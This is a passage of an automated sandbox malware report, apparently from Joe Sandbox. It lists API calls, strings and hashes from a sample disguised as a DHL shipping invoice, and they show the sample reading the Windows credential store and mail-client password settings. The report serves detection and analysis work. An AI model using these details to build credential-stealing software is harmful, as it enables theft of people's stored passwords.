                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                                                                      • String ID: \systemroot
                                                                                                                                                                                                                                      • API String ID: 912701516-1821301763
                                                                                                                                                                                                                                      • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                                                                                                                                      • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                                                                      • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                                                                                                                                      • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                                                                                                                                      • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                                                                                                                                      • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                                                                      • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                                                                      • API String ID: 1640410171-2022683286
                                                                                                                                                                                                                                      • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                                                                                                                                      • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$strlen
                                                                                                                                                                                                                                      • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                                                                      • API String ID: 2619041689-3408036318
                                                                                                                                                                                                                                      • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                                                                      • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$strlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 667451143-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                                                                                                                                                                      • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                                                                                                      • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040882A
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                                                      • String ID: J$Microsoft_WinInet
                                                                                                                                                                                                                                      • API String ID: 3318079752-260894208
                                                                                                                                                                                                                                      • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                                                                                                                                                      • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                                                                                                        • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                                      • API String ID: 888011440-2039793938
                                                                                                                                                                                                                                      • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                                                                                                                                      • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • database is already attached, xrefs: 0042EA97
                                                                                                                                                                                                                                      • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                                                                                                                                      • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                                                                                                                                      • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                                                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                                                                                                                                      • database %s is already in use, xrefs: 0042E9CE
                                                                                                                                                                                                                                      • out of memory, xrefs: 0042EBEF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                                      • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                                      • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                                                                      • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                                                                      • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                                                                      • API String ID: 1348940319-1729847305
                                                                                                                                                                                                                                      • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                                                                      • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                                      • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                                                                      • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FA1E
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                                                                                                                                      • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                                                                      • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                                                                      • API String ID: 945165440-3589380929
                                                                                                                                                                                                                                      • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                                                                      • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                                                                        • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                                                                        • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040371F
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403778
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                                                                                      • String ID: %s@gmail.com
                                                                                                                                                                                                                                      • API String ID: 3261640601-4097000612
                                                                                                                                                                                                                                      • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                                                                                                                                      • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004094C8
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                                                                                                      • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040950C
                                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                                                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                                                                      • String ID: sysdatetimepick32
                                                                                                                                                                                                                                      • API String ID: 3411445237-4169760276
                                                                                                                                                                                                                                      • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                                                                                                                                      • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                                                                                                      • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                                                                                                      • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3642520215-0
                                                                                                                                                                                                                                      • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                                                                      • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
